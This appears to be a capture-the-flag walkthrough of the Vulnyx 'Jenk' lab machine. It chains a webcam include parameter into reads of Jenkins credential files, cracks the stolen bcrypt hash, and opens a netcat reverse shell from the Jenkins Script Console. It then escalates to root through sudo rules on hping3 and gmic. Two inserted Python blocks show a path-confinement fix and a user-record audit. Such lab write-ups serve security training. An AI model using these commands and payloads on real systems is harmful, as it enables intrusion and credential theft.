Vulnyx-Jenk-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.238 08:00:27:0e:11:37 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f3:f4:8b VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.070 seconds (123.67 hosts/sec). 4 responded
export ip=192.168.60.238
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.238:22
Open 192.168.60.238:80
Open 192.168.60.238:8080
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-14 11:27 CST
Initiating ARP Ping Scan at 11:27
Scanning 192.168.60.238 [1 port]
Completed ARP Ping Scan at 11:27, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:27
Completed Parallel DNS resolution of 1 host. at 11:27, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 11:27
Scanning 192.168.60.238 [3 ports]
Discovered open port 8080/tcp on 192.168.60.238
Discovered open port 80/tcp on 192.168.60.238
Discovered open port 22/tcp on 192.168.60.238
Completed SYN Stealth Scan at 11:27, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.238
Host is up, received arp-response (0.0015s latency).
Scanned at 2025-03-14 11:27:46 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
8080/tcp open http-proxy syn-ack ttl 64
MAC Address: 08:00:27:0E:11:37 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Directory enumeration

We find /webcams

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.238
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/webcams (Status: 301) [Size: 318] [--> http://192.168.60.238/webcams/]
Progress: 340379 / 1102800 (30.86%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 342233 / 1102800 (31.03%)
===============================================================
Finished
===============================================================

It is the configuration of a webcam

❯ curl http://192.168.60.238/webcams/includecam.php\?cam\=cam1
<?xml version="1.0" encoding="UTF-8"?>
<camera>
<hostname>cam1</hostname>
<ipaddress>10.0.0.99</ipaddress>
<port>8080</port>
<password>c4m3r4</password>
</camera>

I suspected an LFI (local file inclusion) here and tried to exploit the ?cam parameter, without result.

Port 8080 also exposes a Jenkins service.

❯ whatweb -v $ip:8080
WhatWeb report for http://192.168.60.238:8080
Status : 403 Forbidden
Title : <None>
IP : 192.168.60.238
Country : RESERVED, ZZ

Summary : Cookies[JSESSIONID.e6f0a594], HTTPServer[Jetty(10.0.13)], HttpOnly[JSESSIONID.e6f0a594], Jenkins[2.401.2], Jetty[10.0.13], Meta-Refresh-Redirect[/login?from=%2F], Script, UncommonHeaders[x-content-type-options,x-hudson,x-jenkins,x-jenkins-session]

Detected Plugins:
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.

String : JSESSIONID.e6f0a594

[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.

String : Jetty(10.0.13) (from server string)

[ HttpOnly ]
If the HttpOnly flag is included in the HTTP set-cookie
response header and the browser supports it then the cookie
cannot be accessed through client side script - More Info:
http://en.wikipedia.org/wiki/HTTP_cookie

String : JSESSIONID.e6f0a594

[ Jenkins ]
Jenkins is an application that monitors executions of
repeated jobs, such as building a software project or jobs
run by cron.

Version : 2.401.2
Google Dorks: (1)
Website : http://jenkins-ci.org/

[ Jetty ]
Jetty is a pure Java application server. Jetty provides an
HTTP server, HTTP client, and javax.servlet container.

Version : 10.0.13
Google Dorks: (1)
Website : http://jetty.codehaus.org/jetty/

[ Meta-Refresh-Redirect ]
Meta refresh tag is a deprecated URL element that can be
used to optionally wait x seconds before reloading the
current page or loading a new page. More info:
https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh

String : /login?from=%2F

[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.


[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com

String : x-content-type-options,x-hudson,x-jenkins,x-jenkins-session (from headers)

HTTP Headers:
HTTP/1.1 403 Forbidden
Date: Fri, 14 Mar 2025 03:27:52 GMT
Connection: close
X-Content-Type-Options: nosniff
Set-Cookie: JSESSIONID.e6f0a594=node01wvd9qgontwmz1sdotihw47u340.node0; Path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=utf-8
X-Hudson: 1.395
X-Jenkins: 2.401.2
X-Jenkins-Session: 03c1a8ff
Content-Length: 541
Server: Jetty(10.0.13)

WhatWeb report for http://192.168.60.238:8080/login?from=%2F
Status : 200 OK
Title : Sign in [Jenkins]
IP : 192.168.60.238
Country : RESERVED, ZZ

Summary : Cookies[JSESSIONID.e6f0a594], HTML5, HTTPServer[Jetty(10.0.13)], HttpOnly[JSESSIONID.e6f0a594], Jenkins[2.401.2], Jetty[10.0.13], PasswordField[j_password], UncommonHeaders[x-content-type-options,x-hudson,x-jenkins,x-jenkins-session,x-instance-identity], X-Frame-Options[sameorigin]

Detected Plugins:
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.

String : JSESSIONID.e6f0a594

[ HTML5 ]
HTML version 5, detected by the doctype declaration


[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.

String : Jetty(10.0.13) (from server string)

[ HttpOnly ]
If the HttpOnly flag is included in the HTTP set-cookie
response header and the browser supports it then the cookie
cannot be accessed through client side script - More Info:
http://en.wikipedia.org/wiki/HTTP_cookie

String : JSESSIONID.e6f0a594

[ Jenkins ]
Jenkins is an application that monitors executions of
repeated jobs, such as building a software project or jobs
run by cron.

Version : 2.401.2
Google Dorks: (1)
Website : http://jenkins-ci.org/

[ Jetty ]
Jetty is a pure Java application server. Jetty provides an
HTTP server, HTTP client, and javax.servlet container.

Version : 10.0.13
Google Dorks: (1)
Website : http://jetty.codehaus.org/jetty/

[ PasswordField ]
find password fields

String : j_password (from field name)

[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com

String : x-content-type-options,x-hudson,x-jenkins,x-jenkins-session,x-instance-identity (from headers)

[ X-Frame-Options ]
This plugin retrieves the X-Frame-Options value from the
HTTP header. - More Info:
http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
aspx

String : sameorigin

HTTP Headers:
HTTP/1.1 200 OK
Date: Fri, 14 Mar 2025 03:27:58 GMT
Connection: close
X-Content-Type-Options: nosniff
Content-Type: text/html;charset=utf-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store,must-revalidate
X-Hudson: 1.395
X-Jenkins: 2.401.2
X-Jenkins-Session: 03c1a8ff
X-Frame-Options: sameorigin
Content-Encoding: gzip
X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6qPbkwm/Lq2Osr70fsrpPlgwoNsgKcKdY3a8uJNrwzkzMNoB3pz1PKWqV5OItojSxVg1dkcf0dhS5OLv5Y4SpCPCioP/nfF0odo9GXMrrAvp4GCEhjDcU4tauk8DAv/pBiyxy5gpoJv9Ay1iVLOBZw2uoDAcFZgheAcN+gTeGEWoFvJ2+ED2dkWstmGvI5TnH2Uax9BkJmp7SBi5+08mkJeWXgWi15o8ul09okcJQTJNNgEIHHzTLhArCLloJ7GoaILCPaZuurUl9BEw1eMkNBijL9DVqyo+a7zxhWgFVXlwBEJC+KN8T1fCUzeqjaJgQgEVzKOrQb3Dnp1evpKwXwIDAQAB
Set-Cookie: JSESSIONID.e6f0a594=node01aoao12kzvc5w1gkfplpibbq7g1.node0; Path=/; HttpOnly
Content-Length: 706
Server: Jetty(10.0.13)


Looking at the Jenkins version, I tried to find vulnerabilities for that release.

There is an LFI / arbitrary file read vulnerability, CVE-2024-23897, but I could not exploit it successfully.


So it is back to the earlier cam parameter to look for an entry point.

LFI (file inclusion)

When you access ?cam=cam1 you get the contents of the XML file, but accessing ?cam=cam1.xml returns nothing, so I guessed that the path automatically gets the suffix .xml appended.

Try reading Jenkins's XML files
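The include behaviour described above (the server appends .xml to whatever is passed in ?cam and opens the result, which is why an absolute path like /var/lib/jenkins/users/users reads Jenkins's own users.xml) is the bug class, and the fix is to never let the parameter choose the directory. The following is an added example, not code from the Jenk machine or from this walkthrough, showing how such a lookup should be confined: a strict allow-list on the name, the suffix appended server-side, and a containment check on the normalised path. The base directory /srv/webcams and the function names are assumptions for the example.

```python
"""Confining a file-include parameter to one directory (added example)."""
import os
import re

# Allow-list for the cam name: letters, digits, underscore, hyphen only.
# Dots and slashes are excluded, so "cam1.xml", "../x" and absolute paths
# never reach the filesystem layer at all.
CAM_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")
SUFFIX = ".xml"  # appended by the server, never taken from the client


class UnsafeCamName(ValueError):
    """Raised when the cam parameter is rejected."""


def resolve_cam_config(base_dir: str, cam: str, strict: bool = True) -> str:
    """Return the config file path for `cam`, or raise UnsafeCamName.

    Two independent layers are applied so that a mistake in one does not
    reopen the traversal: the allow-list on the raw value (`strict`), then
    a containment check on the normalised path. `strict=False` exists only
    to demonstrate that the containment check alone still blocks escapes.
    """
    if strict and not CAM_NAME.fullmatch(cam):
        raise UnsafeCamName(f"rejected cam name: {cam!r}")
    base = os.path.abspath(base_dir)
    # os.path.join discards `base` when the second argument is absolute;
    # that is exactly how ?cam=/var/lib/jenkins/... escaped on the target,
    # so the joined path is normalised and checked against the base.
    candidate = os.path.abspath(os.path.join(base, cam + SUFFIX))
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeCamName(f"path escapes base directory: {candidate}")
    return candidate


def classify(base_dir: str, cam: str, strict: bool = True) -> str:
    """Return 'allowed' or the rejection reason, for reporting."""
    try:
        resolve_cam_config(base_dir, cam, strict)
        return "allowed"
    except UnsafeCamName as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed sample values covering the cases seen in the walkthrough
    # plus a classic traversal and a NUL byte.
    samples = ["cam1", "cam1.xml", "/var/lib/jenkins/users/users",
               "../../etc/passwd", "cam1\x00"]
    for s in samples:
        print(f"{s!r:36} -> {classify('/srv/webcams', s)}")
```

With the allow-list in place, `cam1.xml` is refused outright rather than silently becoming `cam1.xml.xml`, and the absolute Jenkins path is caught twice: by the allow-list and, if that were ever relaxed, by the containment check.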

We obtain a user ID: andrew_15328478385288074167

❯ curl http://192.168.60.238/webcams/includecam.php\?cam\=/var/lib/jenkins/users/users
<?xml version='1.1' encoding='UTF-8'?>
<hudson.model.UserIdMapper>
<version>1</version>
<idToDirectoryNameMap class="concurrent-hash-map">
<entry>
<string>andrew</string>
<string>andrew_15328478385288074167</string>
</entry>
</idToDirectoryNameMap>
</hudson.model.UserIdMapper>%

With this user id known, read the user's personal config next.

❯ curl http://192.168.60.238/webcams/includecam.php\?cam\=/var/lib/jenkins/users/andrew_15328478385288074167/config
<?xml version='1.1' encoding='UTF-8'?>
<user>
<version>10</version>
<id>andrew</id>
<fullName>Andrew Miler</fullName>
<properties>
<com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="[email protected]">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>
</com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
<hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="[email protected]">
<triggers/>
</hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
<hudson.model.MyViewsProperty>
<views>
<hudson.model.AllView>
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>
<name>all</name>
<filterExecutors>false</filterExecutors>
<filterQueue>false</filterQueue>
<properties class="hudson.model.View$PropertyList"/>
</hudson.model.AllView>
</views>
</hudson.model.MyViewsProperty>
<org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="[email protected]">
<providerId>default</providerId>
</org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
<hudson.model.PaneStatusProperties>
<collapsed/>
</hudson.model.PaneStatusProperties>
<jenkins.security.seed.UserSeedProperty>
<seed>df7162166260558b</seed>
</jenkins.security.seed.UserSeedProperty>
<hudson.search.UserSearchProperty>
<insensitiveSearch>true</insensitiveSearch>
</hudson.search.UserSearchProperty>
<hudson.model.TimeZoneProperty/>
<jenkins.model.experimentalflags.UserExperimentalFlagsProperty>
<flags/>
</jenkins.model.experimentalflags.UserExperimentalFlagsProperty>
<hudson.security.HudsonPrivateSecurityRealm_-Details>
<passwordHash>#jbcrypt:$2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu</passwordHash>
</hudson.security.HudsonPrivateSecurityRealm_-Details>
<hudson.tasks.Mailer_-UserProperty plugin="[email protected]_e015e5">
<emailAddress>[email protected]</emailAddress>
</hudson.tasks.Mailer_-UserProperty>
<jenkins.security.ApiTokenProperty>
<tokenStore>
<tokenList/>
</tokenStore>
</jenkins.security.ApiTokenProperty>
<jenkins.security.LastGrantedAuthoritiesProperty>
<roles>
<string>authenticated</string>
</roles>
<timestamp>1689941739701</timestamp>
</jenkins.security.LastGrantedAuthoritiesProperty>
</properties>
</user>%
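The two files read above, $JENKINS_HOME/users/users.xml (the id-to-directory map) and users/&lt;dir&gt;/config.xml, are also what a defender should be reviewing. The following is an added example, not a Jenkins tool and not from this walkthrough: it parses both files offline and reports the items that matter for an audit, the password hash format and bcrypt cost, the granted roles, and whether API tokens are stored. The sample documents are constructed to match the shape of the ones on the page (the hash is the one the walkthrough recovered; plugin attributes are omitted), and the minimum-cost threshold of 10 is an assumed policy value.

```python
"""Offline audit of Jenkins user records (added example)."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

JBCRYPT_HEADER = "#jbcrypt:"  # prefix Jenkins writes in front of bcrypt hashes
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")
XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")

# Constructed sample files mirroring the layout seen on the page.
USERS_XML = """<?xml version='1.1' encoding='UTF-8'?>
<hudson.model.UserIdMapper>
  <version>1</version>
  <idToDirectoryNameMap class="concurrent-hash-map">
    <entry>
      <string>andrew</string>
      <string>andrew_15328478385288074167</string>
    </entry>
  </idToDirectoryNameMap>
</hudson.model.UserIdMapper>
"""

CONFIG_XML = """<?xml version='1.1' encoding='UTF-8'?>
<user>
  <version>10</version>
  <id>andrew</id>
  <fullName>Andrew Miler</fullName>
  <properties>
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
    <jenkins.security.ApiTokenProperty>
      <tokenStore>
        <tokenList/>
      </tokenStore>
    </jenkins.security.ApiTokenProperty>
    <jenkins.security.LastGrantedAuthoritiesProperty>
      <roles>
        <string>authenticated</string>
      </roles>
      <timestamp>1689941739701</timestamp>
    </jenkins.security.LastGrantedAuthoritiesProperty>
  </properties>
</user>
"""


@dataclass
class UserReport:
    user_id: str
    directory: str
    full_name: str = ""
    hash_format: str = "none"
    bcrypt_cost: Optional[int] = None
    roles: List[str] = field(default_factory=list)
    api_tokens: int = 0
    findings: List[str] = field(default_factory=list)


def parse_jenkins_xml(text: str) -> ET.Element:
    """Jenkins writes an XML 1.1 declaration, which some parsers refuse,
    so the declaration is dropped before handing the document to expat."""
    return ET.fromstring(XML_DECL_RE.sub("", text, count=1))


def parse_user_map(users_xml: str) -> Dict[str, str]:
    """Map Jenkins user id -> directory name under $JENKINS_HOME/users."""
    mapping: Dict[str, str] = {}
    for entry in parse_jenkins_xml(users_xml).iter("entry"):
        strings = [s.text or "" for s in entry.findall("string")]
        if len(strings) == 2:
            mapping[strings[0]] = strings[1]
    return mapping


def analyze_password_hash(value: Optional[str]) -> Tuple[str, Optional[int]]:
    """Classify a passwordHash value: ('bcrypt', cost) for #jbcrypt: hashes,
    ('legacy', None) for the old pre-bcrypt format, else malformed/none."""
    if not value:
        return "none", None
    if value.startswith(JBCRYPT_HEADER):
        m = BCRYPT_RE.match(value[len(JBCRYPT_HEADER):])
        return ("bcrypt", int(m.group(1))) if m else ("malformed", None)
    return "legacy", None


def audit_user(user_id: str, directory: str, config_xml: str,
               min_cost: int = 10) -> UserReport:
    """Build a report for one user's config.xml; min_cost is policy."""
    root = parse_jenkins_xml(config_xml)
    report = UserReport(user_id=user_id, directory=directory)
    report.full_name = (root.findtext("fullName") or "").strip()
    hash_el = next(root.iter("passwordHash"), None)
    report.hash_format, report.bcrypt_cost = analyze_password_hash(
        hash_el.text if hash_el is not None else None)
    roles_el = next(root.iter("roles"), None)
    if roles_el is not None:
        report.roles = [s.text or "" for s in roles_el.findall("string")]
    token_list = next(root.iter("tokenList"), None)
    report.api_tokens = len(list(token_list)) if token_list is not None else 0
    if report.hash_format != "bcrypt":
        report.findings.append(f"password hash is {report.hash_format}, not bcrypt")
    elif report.bcrypt_cost < min_cost:
        report.findings.append(f"bcrypt cost {report.bcrypt_cost} below minimum {min_cost}")
    if report.api_tokens:
        report.findings.append(f"{report.api_tokens} API token(s) stored")
    return report


if __name__ == "__main__":
    for uid, directory in parse_user_map(USERS_XML).items():
        print(audit_user(uid, directory, CONFIG_XML))
```

The hash on this machine is bcrypt at cost 10, which is Jenkins's default; the weak link was the password itself, which is why a wordlist recovered it in seconds, so the audit is only useful alongside a password policy and a check on how these files are exposed.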

Hash cracking

We have the password hash #jbcrypt:$2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu

Cracking it gives the password andrew1

❯ vi hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 4 for all loaded hashes
Cost 2 (algorithm specific iterations) is 10 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
andrew1 (#jbcrypt)
1g 0:00:00:09 DONE (2025-03-14 14:08) 0.1070g/s 92.50p/s 92.50c/s 92.50C/s football1..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Log in with these credentials, andrew:andrew1

In Manage Jenkins, open the Script Console and run a payload to get a reverse shell

println "nc -e /bin/bash 192.168.60.100 4444".execute().text

User privilege escalation

Listen on the port

The jenkins user has sudo rights to run hping3 (as andrew)

❯ pwncat-cs -lp 4444
[14:19:09] Welcome to pwncat 🐈! __main__.py:164
[14:19:10] received connection from 192.168.60.238:48334 bind.py:84
[14:19:10] 192.168.60.238:48334: registered new host w/ db manager.py:957
(local) pwncat$
(remote) jenkins@jenk:/var/lib/jenkins$ sudo -l
Matching Defaults entries for jenkins on jenk:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jenkins may run the following commands on jenk:
(andrew) NOPASSWD: /usr/sbin/hping3

Normal privilege escalation

(remote) jenkins@jenk:/var/lib/jenkins$ sudo -u andrew /usr/sbin/hping3
hping3> /bin/bash
andrew@jenk:/var/lib/jenkins$ cd ~
andrew@jenk:~$ cat user.txt
0210bf1feef973181bfff9a28e845f71
andrew@jenk:~$ sudo -l
Matching Defaults entries for andrew on jenk:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User andrew may run the following commands on jenk:
(root) NOPASSWD: /usr/bin/gmic

Root privilege escalation

Use gmic's exec parameter to run shell commands

andrew@jenk:~$ sudo -l
Matching Defaults entries for andrew on jenk:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User andrew may run the following commands on jenk:
(root) NOPASSWD: /usr/bin/gmic
andrew@jenk:~$ sudo /usr/bin/gmic -exec "bash"
[gmic]-0./ Start G'MIC interpreter.
[gmic]-0./ Execute external command 'bash' in verbose mode.
root@jenk:/home/andrew# id
uid=0(root) gid=0(root) grupos=0(root)
root@jenk:/home/andrew# cd ~
root@jenk:~# cat /root/root.txt
d02c2cc0136e5c3bcba433098f746e42